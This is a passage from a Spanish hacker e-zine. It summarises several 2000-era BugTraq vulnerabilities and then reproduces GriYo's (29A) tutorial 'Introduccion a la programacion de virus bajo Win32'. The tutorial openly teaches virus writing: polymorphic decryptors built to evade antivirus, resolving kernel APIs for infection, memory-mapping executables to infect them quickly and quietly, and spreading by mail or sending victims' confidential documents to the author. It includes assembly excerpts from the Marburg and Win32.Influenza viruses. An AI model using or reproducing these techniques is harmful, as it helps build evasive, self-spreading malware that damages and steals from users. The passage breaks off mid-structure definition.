URL relevante: http://www.securityfocus.com/bid/987
Resumen:
Existe una vulnerabilidad en la implementaron del procfs en
NetBSD, en versiones hasta la 1.4.1 (incluida). Un atacante
podría manipular archivos en la jerarquía /proc/<pid>/,
específicamente el archivo 'mem', para hacer que un programa
setuid ejecute un shell como root.
La funcion procfs_checkioperm() protege los acceso a
proc/<pid>/mem. Sin embargo, las aplicaciones que corren bajo uid
0 pueden escribir al archivo mem. Si un proceso setuid puede ser
enganado para escribir en este archivo, se hace posible
manipularlo para ejecutar un shell con privilegios de root.
Un posible metodo que se explica en el aviso de NetBSD logra esto
al abrir /proc/<pid>/mem, y hacer un dup2() a stdout. Tras hacer
un seek (lseek() o fseek(), o cualquier otro metodo para cambiar
el offset en el archivo), el proceso padre ejecutara un binario
setuid. Este programa va a heredar el archivo mem como stdout.
Este archivo setuid tiene que ser enganado al escribir, por
ejemplo, un error o mensaje conteniendo el shell code. Mientras
tanto, el padre ejecutara otro programa setuid, cuya pila sera
sobrescrita por el proceso setuid. Esto a su vez causara que un
shell con uid 0 sea ejecutado.
5. Vulnerabilidad de symlink en /tmp en SCO Unixware ARCserver
BugTraq ID: 988
Remoto: desconocido
Fecha de publicacian: 15-02-2000
URL relevante: http://www.securityfocus.com/bid/988
Resumen:
Existe una vulnerabilidad de seguimiento de symlink en el agente
ARCserver, que viene con SCO Unixware 7. Al inicializarse, el
programa asagent crea varios archivos en /tmp. Estos se crean con
mode 777, y puede ser borrados y reemplazados por cualquier
usuario del sistema. Si son reemplazados por symlinks, es posible
crear archivos en cualquier parte del sistema de archivos con
root como propietario. Esto no se puede usar para cambiar los
permisos de archivos existentes. Sin embargo, el contenido del
nuevo archivo es /usr/CYEagent/agent.cfg. Este archivo es
escribible por todos.
6. Vulnerabilidad de falta de proteccian del compartido ADMIN$
durante la instalacian de Microsoft Windows 2000
BugTraq ID: 990
Remoto: Sí
Fecha de publicacian: 15-02-2000
URL relevante: http://www.securityfocus.com/bid/990
Resumen:
Durante el procedimiento de instalacian de Windows 2000 se crea
el recurso compartido ADMIN$. Sin embargo, el password de
Administrator (Administrador) aunque sea modificado no se activa
hasta el siguiente reinicio. Por lo tanto, durante este periodo
de tiempo es posible para cualquier con acceso de red a la
maquina el conectarse al compartido como Administrator sin
password.
7. Vulnerabilidad de ejecucian de comandos arbitrarios en
Ultimate Bulletin Board
BugTraq ID: 991
Remoto: Sí
Fecha de publicacian: 13-02-2000
URL relevante: http://www.securityfocus.com/bid/991
Resumen:
El software Ultimate Bulletin Board de Infopop (llamado
habitualmente UBB) es un paquete escrito en perl para ofrecer
mensajería vía web. Debido a errores en expresiones regulares que
chequean los valores ingresados en formularios, es posible
ejecutar comandos arbitrarios en un servidor con UBB.
Para escribir datos al sistema de archivos del servidor web donde
corre UBB se agrega en ubb_library.pl la variable $ThreadFile al
final de un string pasado a open() (como un filepath). Se usan
expresiones regulares para asegurarse que los datos variables
estan en el formato apropiado:
if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/)
y en la versian comercial:
if ($ThreadFile =~ /\d\d\.[m|n|ubb|cgi]/) {
Desafortunadamente, las expresiones regulares no requieren que
".ubb" sea el final de los strings, lo que significa que se
pueden incluir datos extra despues del ".ubb" y el valor aun
coincidira con las expresiones (if $ThreadFile esta correcto) y
se pasara a open(). El valor de $ThreadFile se obtiene
directamente de una variable (llamada 'topic') "escondida" en un
formulario html. Lo que hace de esto una vulnerabilidad posible
de ser explotada remotamente.
8. Vulnerabilidad en autorun.inf de Microsoft Windows
BugTraq ID: 993
Remoto: No
Fecha de publicacian: 18-02-2000
URL relevante: http://www.securityfocus.com/bid/993
Resumen:
La opcian Autorun de Windows fue disenada para permitir que un
ejecutable y un icono sean especificados para un medio removible.
Al insertarlo, se mostrara el icono para esa unidad y se llamara
al ejecutable de forma automatica. Sin embargo, esta opcian
tambien se aplica a unidades fijas, haciendo su abuso mucho mas
facil.
Cualquier usuario con acceso de escritura al directorio raíz de
una unidad lagica puede instalar un ejecutable y especificarlo en
un archivo autorun.inf. Luego, cada vez que se acceda a la
unidad, el cadigo sera ejecutado con los privilegios del usuario
actualmente logueado. Esto se puede usar en ataques de escalada
de privilegios.
Notese que esto tambien afecta a las unidades removibles. Pero el
que sea posible especificar un cadigo que se ejecute de forma
automatica en cualquier unidad local lo hace mucho mas sencillo
de explotar.
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Mundo Virico
~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
El siguiente texto no es de mi autoria, este pertenece a Griyo, uno de los
integrantes del conocido grupo 29A, creador de virus tan conocidos como Cri-Cri, Anti-Eta,
Cholera, etre otros .
Este artikulo esta alojado en la pagina del grupo de Hackers espanol "Mentes Inquietas".
Por el cual siento admiracion ya que fue la primera pagina hacker que visite y la
que desperto en mi el interes por el mundillo hacker, ese pequeno instinto que
llevamos dentro ;).
Pueden ver la pagina en la siguiente url: http://www.hispahaccck.com
BuEn0, BasTa de r0Y0s y eMpez3mos kon l0 que en verdad n0s interesa...
Introduccion a la programacion de virus bajo Win32
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Por GriYo
Indice.
Mirada al pasado.
Un alfabeto infinito.
¨Quien ha escondido la caja de herramientas?.
Todo lo que quieras hacer.
Memoria fotografica.
Proteccion contra errores.
Un muro mas alto, pero con mas puertas.
Tiene correo nuevo.
Apendices:
Apendice A: 29A Include Files
Apendice B: Codigo fuente
Mirada al pasado.
Si damos un paseo por Internet en busca de paginas especializadas en el tema de los virus informaticos
nos encontraremos con un monton de documentos, colecciones de virus, fuentes, links muertos y todo
tipo de informacion totalmente obsoleta. El motivo de esto lo encontramos en la desaparicion paulatina del
MsDos. De los cerca de 30.000 virus conocidos hoy en día el 90% aproximadamente son virus de MsDos.
La mayoria de estos virus de MsDos que fueron tan famosos hace a¤os dejaron de funcionar con la
aparicion de Windows. Muchos virus utilizan metodos indocumentados y poco compatibles, y de igual
forma que ocurre con los *exploits* o con los *denial of service* las tecnicas empleadas dejan de funcionar,
y los problemas de seguridad se arreglan ( aunque en ocasiones se acrecientan ).
Con la aparicion de Windows 3.0 muchos virus perdieron la compatibilidad, pero la *scene* aun estaba
muy concurrida, y no tardaron en salir a la luz trabajos orientados a este entorno. Esto mismo sucedio con
la llegada de las sucesivas versiones de Windows anteriores al 95. Trabajos como el virus Sucksexee (aka
Implant.6128) exprimieron hasta los extremos mas insospechados toda la capacidad del MsDos. Algunas
caracteristicas de este virus son:
Full-stealth:
Esta tecnica persigue ocultar totalmente la existencia del virus. Si abrimos un fichero infectado este
aparecera limpio, y lo mismo ocurrira si lo intentamos con un debugger. No se aprecia aumento
alguno en el tama¤o de los ejecutables, pese a que algunos han crecido cerca de 6Kb.
Retro-virus:
El virus fue dise¤ado para atacar directamente al software antivirus. Un ejemplo: Si estando el virus
activo en memoria ejecutamos el antes conocidisimo ThunderByte Antivirus, ciertos parametros son
a¤adidos automaticamente a la linea de comandos, de forma que el escaneo de la memoria
quedaba desactivado sin que el usuario se percatara de esta perdida de operatividad en su software
antivirus. Otra caracteristica *retro* de este virus es su capacidad para desactivar el arranque desde
disquetes, lo que obligaba a arrancar desde la unidad de disco ya infectada.
Polimorfismo:
Esta tecnica llego de la mano de autores como Dark Avenger con su "Mutation Engine" o el grupo
holandes Trident con su "TPE". La idea basica es crear un bucle sencillo que recorre el virus,
encriptando cada byte. Este bucle es generado de forma tal que varia de una infeccion a otra. Las
posibles variaciones en el bucle son:
Recorrer el virus desde la direccion de memoria mas baja, incrementando en cada iteracion
el puntero que hace referencia a esta direccion de memoria. O el caso opuesto, recorrer el
virus desde el final ( direccion de memoria mas alta ) hasta el principio, decrementando el
puntero en cada iteracion.
En cada iteracion el puntero incrementa o decrementa, pero esta variacion puede ser de 1
byte o 2 bytes, puesto que el 8086 y sus sucesores permitian realizar operaciones con bytes
o words.
La operacion aritmetica que se usa para encriptar el virus tambien es variable. Cualquiera
vale, por simple que sea, lo importante es alcanzar la maxima variabilidad. El bucle puede
recorrer el virus sumando 01h a cada byte, restando, haciendo un OR EXCLUSIVO o incluso
rotando cada valor un numero de bits a la izquierda o derecha. Lo importante es que la
operacion utilizada sea sencilla y tenga inversa.
Como vemos, es posible hacer infinitas combinaciones, y esa es la clave. Los antivirus, por
aquel entonces, realizaban la búsqueda de ficheros infectados mediante una sencilla
comparacion de cadenas. El antivirus abria cada fichero del disco y buscaba en su interior
fragmentos de virus. Este metodo presentaba problemas claramente evidentes:
Es necesario conocer la cadena que se quiere buscar, por lo que solo podran ser detectados
aquellos virus *conocidos* por el antivirus.
Al crecer el numero de virus crece la cantidad de cadenas a buscar dentro de cada fichero,
con la consiguiente ralentizacion del proceso de escaneado.
El polimorfismo significaba la evasion total y efectiva a estos metodos de deteccion. Un virus
polimorfico presenta un numero tan elevado de posibles mutaciones que seria imposible
almacenar y buscar todas sus variantes.
Multipartito:
El virus infecta múltiples objetivos en un mismo sistema. En este caso se trata del MBR (Master
Boot Record), los archivos con extension .COM, los archivos .EXE e incluso los archivos. SYS.
Encontramos esta caracteristica en su maxima expresion en los virus multi-plataforma.
Me atreveria a decir que dificilmente se podia llegar tan lejos en las tecnicas empleadas sin mermar
gravemente la capacidad del sistema, pero para entonces los desarrolladores de antivirus menos
incompetentes dieron con lo que pudo haber sido la solucion definitiva. Aparecio la búsqueda heuristica,
basada en la aplicacion de tecnicas de inteligencia artificial. Pero todos sabemos que por muy inteligente
que sea un programa de ordenador, jamas lo sera de igual manera que un ser humano, y no han tardado
en aparecer tecnicas *anti-heuristicas*. Pero veamos un poco mas sobre la búsqueda heuristica. Se trata
de examinar un programa en busca de signos de infeccion. Un virus, cuando infecta un ejecutable,
necesita realizar algunos cambios en el, siendo estos cambios sospechosos el objeto de la búsqueda por
parte del anti-virus. Los motores heuristicos mas avanzados eran capaces de detectar virus polimorficos,
puesto que detectaban el bucle de encriptacion del que hablabamos anteriormente, e incluso llegaban mas
lejos, y mediante emulacion eran capaces de deshacer este bucle y obtener una imagen clara del virus,
pudiendo aplicar entonces la búsqueda por cadenas tradicional. El problema de la búsqueda heuristica
radica en que ofrece siempre una solucion, aunque esta pueda no ser la correcta. Me refiero a los falsos
positivos, es decir, programas que por sus especiales caracteristicas dan positivo al buscar virus en ellos.
En mas de una ocasion algún conocido antivirus ha dado por infectado algún fichero del sistema, con la
subsiguiente avalancha de usuarios mosqueados. Con la aparicion de Windows 95 y de la nueva
plataforma Win32 todas estas tecnicas, dependientes del funcionamiento interno del MsDos, dejaron de
funcionar. La mayoria de los virus de sector de arranque se delatan a si mismos tras infectar una maquina
con Windows 95, que incorpora algunos mecanismos de proteccion contra los virus, basicos y primitivos.
Otro ejemplo de esta perdida de funcionalidad son los virus *stealth*, puesto que emplean tecnicas no
compatibles con el nuevo formato de nombres largos y las nuevas funciones de búsqueda de ficheros del
sistema.
El desarrollo de virus se paralizo durante un tiempo. Seguian apareciendo virus de MsDos, pero el peligro
estaba ya lejos. Aparecieron los primeros intentos dentro del ambito de Win32, de la mano del siempre
innovador grupo VLAD y su virus Bizatch ( denominado Boza por la gente de los anti-virus). Este virus
empleaba tecnicas primitivas que impedian su correcto funcionamiento ( como asumir direcciones fijas en
memoria para el kernel y sus funciones), pero suponia un primer paso que
seguramente alento a muchos
otros autores que no tardaron en dar el paso y empezar a investigar sobre esta nueva plataforma. Fue en
este paso, para algunos de gigante, cuando desaparecio gran parte de la scene. Las paginas web que
antes recogian puntual informacion sobre la scene empezaron a no ser actualizadas con tanta regularidad,
dada la falta de avances o descubrimientos. Solo algunos grupos concentraron todas sus fuerzas en la
nueva plataforma, y aparecieron los primeros intentos serios, de la mano de grupos como IKX o 29A.Jacky
Qwerty, autor del grupo 29A, fue sin duda uno de los impulsores de la tecnologia virica bajo 32bits. Sus
virus Jacky y Cabanas asentaron las bases de lo que luego serian infectores mas complejos y avanzados.
Los desarrolladores de anti-virus aun andaban pensando como portar sus motores de búsqueda heuristica
a Win32 cuando aparecio el primer virus polimorfico capaz de infectar ejecutables de Win32. Marburg pillo
a muchos con los pantalones bajados, y eso le impulso *in-the-wild* llegando a aparecer ficheros
infectados en los CdRom de revistas ampliamente difundidas, como PcGamer o PcPowerPlay. Las
primeras muestras del virus Marburg cayeron en manos de los desarrolladores de anti-virus en agosto de
1998, cuando el virus llevaba ya cerca de 9 meses *in-the-wild*. Pese a esto aun tardaron unos dos meses
mas en ser capaces de adaptar sus paquetes para ser capaces de afrontar este nuevo ataque. La guerra
se declaraba de nuevo.
La nueva plataforma suponia un esfuerzo extra a la hora de desarrollar virus, pero su mayor potencial ponia
en las manos de sus autores armas aun mas potentes. Describir este nuevo potencial y su aplicacion al
desarrollo de virus es el objetivo de este articulo.
Un alfabeto infinito.
Esta claro que 16bits no son lo mismo que 32bits, ¿pero que diferencia supone esto a la hora de dise¤ar
un motor de polimorfismo?. Para empezar ya no contamos solo con registros de 16bits ( ax, bx, etc..) si
no que disponemos de toda la potencia del juego de registros extendidos ( eax, ebx, etc..). Una primera
mejora sobre un motor de polimorfismo de 16bits seria a¤adir los 16bits que le faltan para llegar a 32.
Veamos un ejemplo con una instruccion sencilla en ensamblador, MOV con el registro acumulador como
destino. Donde antes solo podiamos generar:
MOV AL,imm8bit
MOV AH,imm8bit
MOV AX,imm16bit
Ahora contamos con las siguientes posibilidades:
MOV AL,imm8bit
MOV AH,imm8bit
MOV AX,imm16bit
MOV EAX,imm32bit
Esto solo supone un incremento en la variabilidad de una sola instruccion, pero si ampliamos el ejemplo al
resto de los registros y al resto de las instrucciones veremos que se trata de una importante mejora. Otro
aspecto importante radica en el acceso a memoria que el bucle realiza a la hora de desencriptar el virus.
En los antiguos motores de polimorfismo contabamos con acceso byte a byte o word a word, por ejemplo:
ADD BYTE PTR DS:[mem],imm8bit
ADD WORD PTR DS:[mem],imm16bit
Puesto que ahora andamos en Win32 no solo nos podemos deshacer de los registros de segmento (la
memoria aparece plana a la vista de la aplicacion, no segmentada) si no que ademas contamos con
instrucciones que acceden a posiciones de memoria de 32bits. El ejemplo anterior se ampliaria a:
ADD BYTE PTR [mem],imm8bit
ADD WORD PTR [mem],imm16bit
ADD DWORD PTR [mem],imm32bit
De nuevo ganamos una sola posibilidad mas de variacion, pero repito, si esto lo aplicamos a todas las
posibles instrucciones daremos con una bonita explosion combinatoria, a la que aun nos queda por a¤adir
mas posibilidades. Una de ellas esta formada por los nuevos metodos de indexacion, donde antes
podiamos generar:
ADD BYTE PTR DS:[reg],imm8bit
ADD BYTE PTR DS:[reg+imm],imm8bit
Ahora nos encontramos con las siguientes posibilidades:
ADD BYTE PTR [reg],imm8bit
ADD BYTE PTR [reg+imm],imm8bit
ADD BYTE PTR [reg+reg],imm8bit
ADD BYTE PTR [reg+reg+imm],imm8bit
Incluso podemos utilizar alguno de los exoticos modos de indexacion del 386+ como por ejemplo
[reg*02h]. Aqui hemos ganados mas posibilidades, que se multiplican al aplicar el ejemplo no solo a ADD
y a referencias a BYTE, si no al resto de las instruciones y al resto de los tama¤os del operador ( WORD
y DWORD). Evidentemente, un gran potencial, y solo hemos empezado por analizar las instrucciones y
registros del procesador. La generacion automatica de codigo polimorfico alcanza sus mas altas cotas en
aquellos engines capaces de seguir la evolucion del codigo que generan, conociendo en cualquier
momento el estado de cualquier registro o incluso su valor. A continuacion podemos observar un fragmento
del decriptor polimorfico que el virus Win32.Influenza utiliza para ocultar su presencia en los ficheros
infectados:
:00401376 E81D000000 call 00401398
. .
. .
. .
:00401398 BE5F4D853E mov esi,3E854D5F
:0040139D 87DE xchg esi,ebx
:0040139F 5B pop ebx
:004013A0 668BFB mov di,bx
:004013A3 8BF8 mov edi,eax
:004013A5 66BDB0C8 mov bp,C8B0
:004013A9 5D pop ebp
:004013AA 0F8C03000000 jl 004013B3
:004013B0 6687D3 xchg bx,dx
:004013B3 FD std
:004013B4 664B dec bx
:004013B6 E9AA260100 jmp 00413A65
. .
. .
. .
:00413A65 E815000000 call 00413A7F
. .
. .
. .
:00413A7F 87FA xchg edx,edi
:00413A81 F8 clc
:00413A82 664F dec di
:00413A84 5B pop ebx
:00413A85 8AEE mov ch,dh
:00413A87 E912000000 jmp 00413A9E
Podemos observar como el codigo generado presenta una estructura compleja similar a la de un programa
real. El motor de polimorfismo no tiene problemas para generar estructuras como la instruccion CALL de la
direccion de memoria 00401376, que transfiere el control varias posiciones mas adelante. En la direccion
0040139F encontramos una instruccion POP que restaura el stack, eliminando la direccion de retorno
guardada por la llamada anterior.
¿Quien ha escondido la caja de herramientas?.
En los virus basados en MsDos utilizabamos las interrupciones que nos permitian acceder a funciones del
MsDos ( int 21h) o de la Bios ( int 13h). Todas esas funciones que utilizabamos para abrir un fichero o
escribir en el residen ahora en DLL's, en este caso en KERNEL32.DLL. Localizar la direccion en memoria
donde reside este modulo es vital, y para ello contamos con varios trucos. El virus puede localizar las
funciones utilizadas por el programa que lo porta, y utilizarlas para infectar. Esto supondria una grave
limitacion: Si un ejecutable no utiliza alguna de las funciones necesarias para el funcionamiento del virus,
este ejecutable no podra ser infectado. Una forma de evitar este problema:
El virus localiza el lugar donde el programa portador guarda la direccion de la funcion
GetModuleHandle y de la funcion GetProcAddress. Estas dos funciones son utilizadas por la
practica totalidad de los ejecutables de Windows, y permitiran al virus localizar la direccion de
memoria donde reside el modulo del kernel ( getmodulehandle), asi como todas sus funciones
exportadas ( getprocaddress).
Otra posibilidad es escanear la memoria en busca del kernel, pero claro, esto no es tan facil como
a primera vista parece, puesto que si durante esta búsqueda accedemos a una direccion protegida
o no asignada provocaremos un error de proteccion, y el consiguiente mensaje que nos indicara que
nuestro programa "ha realizado una operacion incorrecta y se apagara". Para evitar esto contamos
con una de las caracteristicas mas útiles de Win32, que abordaremos con detalle mas adelante,
me estoy refiriendo a SEH ( Stuctured Exception Handling).
Existen otros metodos y seguramente apareceran muchos mas, pero estos dos son los mas efectivos a la
hora de escribir este articulo. Una vez el virus tiene acceso a las APIs ( funciones) del sistema no hay
nada que no pueda hacer ¿ o si?. Para empezar el virus puede poner en funcionamiento las APIs
GetModuleHandle y GetProcAddress recien obtenidas para obtener el punto de entrada de un monton de
funciones del kernel que sin duda le haran falta mas adelante, por ejemplo:
CreateFile
CreateFileMapping
CloseHandle
CopyFile
CreateProcess
DeleteFile
FileTimeToSystemTime
FindClose
FindFirstFile
FindNextFile
FreeLibrary
GetCurrentDirectory
GetCurrentProcess
GetFileAttributes
GetFileSize
GetModuleFilename
GetSystemDirectory
GetTempPath
GetWindowsDirectory
LoadLibrary
MapViewOfFile
MoveFile
SetEndOfFile
SetFileAttributes
SetFileTime
SystemTimeToFileTime
UnmapViewOfFile
VirtualAlloc
WriteProcessMemory
Algunas o todas estas APIs pueden ser de utilidad para el virus. Es de destacar en este punto la funcion
LoadLibrary, que nos permitira cargar en memoria cualquier modulo de Windows y utilizar sus APIs.
El siguiente fragmento pertenece al virus Marburg. Se trata de la rutina encargada de localizar cada una de
las APIs del kernel necesarias para el funcionamiento del virus, todo ello con la ayuda de GetProcAddress.
get_K32_APIs: push ebx
lea esi,dword ptr [ebp+viral_functions]
lea edi,dword ptr [ebp+viral_addresses]
mov ecx,(offset viral_tbl_end-offset viral_functions)/04h
get_each_ep: cld
lodsd
add eax,ebp
push ecx
push esi
push edi
push eax
push dword ptr [ebp+a_Kernel32]
call dword ptr [ebp+a_GetProcAddr]
pop edi
pop esi
pop ecx
or eax,eax
jz exit_get_func
cld
stosd
loop get_each_ep
exit_get_func: mov ecx,eax
pop ebx
ret
viral_functions equ this byte
dd offset szCreateFileA
dd offset szCreateFileMap
dd offset szMapViewOfFile
dd offset szUnmapView
dd offset szCloseHandle
dd offset szFindFirst
dd offset szFindNext
dd offset szFindClose
dd offset szVirtualAlloc
dd offset szGetWinDir
dd offset szGetSysDir
dd offset szGetCurDir
dd offset szSetFileAttr
dd offset szSetFileTime
dd offset szDeleteFile
dd offset szGetCurProc
dd offset szWriteProcMem
dd offset szLoadLibrary
dd offset szGetSysTime
viral_tbl_end equ this byte
szGetModuleH db "GetModuleHandleA",00h
szGetProcAddr db "GetProcAddress",00h
szCreateFileA db "CreateFileA",00h
szCreateFileMap db "CreateFileMappingA",00h
szMapViewOfFile db "MapViewOfFile",00h
szUnmapView db "UnmapViewOfFile",00h
szCloseHandle db "CloseHandle",00h
szFindFirst db "FindFirstFileA",00h
szFindNext db "FindNextFileA",00h
szFindClose db "FindClose",00h
szVirtualAlloc db "VirtualAlloc",00h
szGetWinDir db "GetWindowsDirectoryA",00h
szGetSysDir db "GetSystemDirectoryA",00h
szGetCurDir db "GetCurrentDirectoryA",00h
szSetFileAttr db "SetFileAttributesA",00h
szSetFileTime db "SetFileTime",00h
szDeleteFile db "DeleteFileA",00h
szGetCurProc db "GetCurrentProcess",00h
szWriteProcMem db "WriteProcessMemory",00h
szLoadLibrary db "LoadLibraryA",00h
szGetSysTime db "GetSystemTime",00h
viral_addresses equ this byte
a_CreateFile dd 00000000h
a_CreateFileMap dd 00000000h
a_MapViewOfFile dd 00000000h
a_UnmapView dd 00000000h
a_CloseHandle dd 00000000h
a_FindFirst dd 00000000h
a_FindNext dd 00000000h
a_FindClose dd 00000000h
a_VirtualAlloc dd 00000000h
a_GetWindowsDir dd 00000000h
a_GetSystemDir dd 00000000h
a_GetCurDir dd 00000000h
a_SetFileAttr dd 00000000h
a_SetFileTime dd 00000000h
a_DeleteFile dd 00000000h
a_GetCurProc dd 00000000h
a_WriteProcMem dd 00000000h
a_LoadLibrary dd 00000000h
a_GetSysTime dd 00000000h
Todo lo que quieras hacer.
Utilizando las API's del kernel LoadLibrary y GetProcAddress podemos cargar cualquier modulo de
Windows y obtener las direcciones de las API's que nos interesen dentro de el. Asi podremos incluir en
nuestro virus multitud de caracteristicas nuevas que resultaban impensables cuando aun andabamos en el
MsDos. Algunos de los modulos con cuyas API's podemos contar son:
USER32.DLL y GDI32.DLL
El corazon del interfaz grafico que tan famoso ha hecho a Windows esta a nuestra disposicion para
facilitarnos las cosas a la hora de crear vistosos *payloads* para nuestros virus.
WSOCK32.DLL
Esta libreria proporciona un juego de funciones orientadas a la programacion de aplicaciones que
utilizan TCP/IP. Con su ayuda podemos desarrollar aplicaciones como un cliente de FTP o un
cliente de TELNET, pero tambien podemos utilizarlas dentro de un virus para, por ejemplo, conectar
con un servidor de mail, componer y enviar un mensaje. Este mensaje puede enviarse a otros
usuarios junto con una copia adjunta del virus ( mail spreading ) o puede enviarse a una cuenta
perteneciente al autor del virus, junto a documentos confidenciales extraidos por el virus de la
maquina contaminada.
WININET.DLL
Este modulo contiene funciones destinadas a facilitar tareas tipicas de aplicaciones orientadas a
Internet. Dentro de este modulo encontraremos funciones que nos permitiran conectar con el
proveedor de Internet, transmitir ficheros ( FTP ), descargar paginas web o incluso jugar con las
"cookies".
MAPI32.DLL
Este modulo alberga las funciones de mensajeria de Windows. Con el podemos construir de forma
sencilla un email y adjuntar un fichero al mismo. No siempre encontraremos este modulo en el
sistema, y su utilizacion provoca en ocasiones la aparicion de mensajes indicando el estado de la
operacion que se esta realizando ( el tipico mensaje que muestra Outlook Express en el que se lee
"contactando con el servidor" o "enviando mensaje" ). Es por esto que, pese a lo mucho que
simplifican las tareas de enviar correo, no es recomendable su utilizacion en un virus, donde se
supone que hay que ser un poco mas *discreto*.
ADVAPI32.DLL
El registro del sistema es sin duda una importantisima fuente de informacion. De el podemos
extraer nombres de directorios, servidores, passwords y todo tipo de informacion *sensible*.
Estas son algunos de los modulos mas *golosos* con cuyas funciones podemos contar en nuestro virus,
pero existe toda una pila de modulos destinados a multitud de tareas, no tenemos mas que echar un ojo al
directorio SYSTEM32 dentro de la carpeta de Windows. Otros modulos interesantes en la programacion de
virus podrian ser: NETAPI32.DLL, SHELL32.DLL, RASAPI.DLL, OPENGL32.DLL ...
Memoria fotografica.
Esta caracteristica de Win32 nos da la posibilidad de traernos un ejecutable entero a memoria, por grande
que sea, y acceder a el facilmente utilizando como indice la direccion de memoria donde es mapeado. De
esta forma nos evitamos constantes accesos a disco y desplazamientos innecesarios del puntero de
lectura/escritura. El procedimiento es el siguiente:
Obtenemos un handle sobre el fichero que queremos abrir utilizando CreateFile.
Mapeamos el fichero en memoria usando la API CreateFileMapping.
Una vez mapeado obtenemos la direccion base en memoria donde se ha mapeado el fichero
utilizando MapViewOfFile.
Una vez nos hemos traido el ejecutable entero a memoria ( si es demasiado grande Windows se
encargara de hacer el correspondiente swap ) podemos recorrer su estructura interna sin
problemas, tan solo tenemos que sumar la direccion base al offset al que queremos acceder. Los
ficheros mapeados en memoria permiten a un virus infectar gran cantidad de ficheros en poco
tiempo y pasando inadvertido.
Veamos un ejemplo de como funcionan estas API's:
xor eax,eax ;
push eax ;
push FILE_ATTRIBUTE_NORMAL ; Atributos
push OPEN_EXISTING ; Accion
push eax ;
push eax ;
push GENERIC_WRITE or GENERIC_READ ; Modo de acceso
lea eax,dword ptr [ebp+file2open] ; Nombre del fichero
push eax ;
call dword ptr [ebp+a_CreateFileA] ;
cmp eax,INVALID_HANDLE_VALUE ; ¿ Error ?
je error_createfile ;
mov dword ptr [ebp+h_CreateFile],eax ; Guardamos el handle
xor eax,eax ;
push eax ;
push dword ptr [ebp+size] ; Tama¤o del fichero
push eax ;
push PAGE_READWRITE ; Derechos
push eax ;
push dword ptr [ebp+h_CreateFile] ; Handle
call dword ptr [ebp+a_CreateFileMappingA] ;
or eax,eax ; ¿ Error ?
jz error_filemap ;
mov dword ptr [ebp+h_FileMap],eax ; Guardamos el handle
xor eax,eax ;
push dword ptr [ebp+size] ; Tama¤o del fichero
push eax ;
push eax ;
push FILE_MAP_READ or FILE_MAP_WRITE ; Modo de acceso
push eax ;
call dword ptr [ebp+a_MapViewOfFile] ;
or eax,eax ; ¿ Error ?
jz error_view ;
mov dword ptr [ebp+base_addr],eax ; Guardamos la direccion
Como resultado de la ejecucion satisfactoria del codigo anterior obtenemos un puntero ( que guardamos en
la direccion local indicada por base_addr ) al fichero en memoria. Utilizaremos este puntero para leer o
escribir en memoria, reflejandose estas lecturas/escrituras en el fichero en disco. Una limitacion en esta
tecnica radica en que no podemos hacer crecer el fichero una vez abierto. En el codigo anterior podemos
observar como uno de los parametros de llamada a estas API's es el tama¤o del fichero. Pues bien,
tendremos que abrir el fichero indicando su tama¤o mas el tama¤o requerido por el virus. Pero la primera
vez que abrimos el fichero aun no sabemos si se trata de una victima valida, algunas soluciones a este
problema pasan por:
Abrir el fichero con acceso solo de lectura y respetando su tama¤o original. Una vez comprobamos
que se trata de un fichero apto para la infeccion cerramos el *FileMapping* y lo volvemos a crear,
especificando esta vez el tama¤o original mas el tama¤o necesario para albergar al virus.
Otra posibilidad seria abrir el fichero y crear su imagen en memoria una sola vez, incluyendo el
tama¤o del virus. Si tras inspeccionar el ejecutable descubrimos que no es apto para la infeccion,
restauramos el tama¤o original utilizando la API SetEndOfFile.
Proteccion contra errores.
La gestion de excepciones ( Structured Exception Handling ) es sin duda una de las caracteristicas mas
interesantes y mas utilizadas de Win32 y a la vez de las menos documentadas, al menos por lo que a su
funcionamiento interno se refiere.
Describir el funcionamiento y la implementacion de esta tecnica bien podria ser el objeto de un articulo
entero, y en consecuencia no sera tradado aqui. Para obtener mas informacion visita mi pagina web
(BioTech), en la seccion *PAPERS* encontraras el articulo "A Crash Course on the Depths of Win32
Structured Exception Handling". Un interesantisimo articulo escrito por Matt Pietrek ( autor de libros como
"Windows 95 System Programming Secrets" ) acerca de las interioridades del *SEH*.
Un muro mas alto, pero con mas puertas.
Microsoft introdujo un nuevo formato para los ficheros ejecutables con la llegada de la plataforma Win32. El
nuevo formato, llamado "Portable Executable", pese a resultar mas complejo a primera vista, presenta una
estructura jerarquizada que, una vez comprendidas las estructuras internas que lo forman, facilita
enormemente las labores de búsqueda, analisis y modificacion de los campos que nos interesan.
Lo primero que encontramos al analizar la estructura de un PE es la cabecera MsDos. Se trata de la
misma cabecera que presentan los ficheros .EXE de MsDos. Su finalidad es mostrar un mensaje que dice
algo asi como "This program cannot be run in DOS mode", cuando intentamos ejecutar una aplicacion de
Windows estando en MsDos.
La cabecera de los ficheros .EXE de MsDos presenta una marca que permite identificarla como tal.
Podremos verla si abrimos algún ejecutable con un editor hexadecimal, se trata de los caracteres "MZ". De
igual manera, la cabecera PE se encuentra identificada por la cadena "PE\0\0" que encontramos como
primer campo.
A continuacion aparece la "FileHeader", que recoge informacion basica acerca del fichero, como el numero
de secciones de que consta o la fecha y hora en que fue *linkado*. Veamos la declaracion de esta
estructura:
IMAGE_FILE_HEADER STRUC
FH_Machine DW ?
FH_NumberOfSections DW ?
FH_TimeDateStamp DD ?
FH_PointerToSymbolTable DD BYTE PTR ?
FH_NumberOfSymbols DD ?
FH_SizeOfOptionalHeader DW ?
FH_Characteristics DW ?
IMAGE_FILE_HEADER ENDS
IMAGE_SIZEOF_FILE_HEADER EQU SIZE IMAGE_FILE_HEADER
Le sigue la "OptionalHeader", que pese a su nombre de *optional* contiene informacion concreta e
indispensable para la correcta interpretacion del resto del ejecutable. Esta es la declaracion:
IMAGE_OPTIONAL_HEADER STRUC
; Standard fields:
OH_Magic DW ?
OH_MajorLinkerVersion DB ?
OH_MinorLinkerVersion DB ?
OH_SizeOfCode DD ?
OH_SizeOfInitializedData DD ?
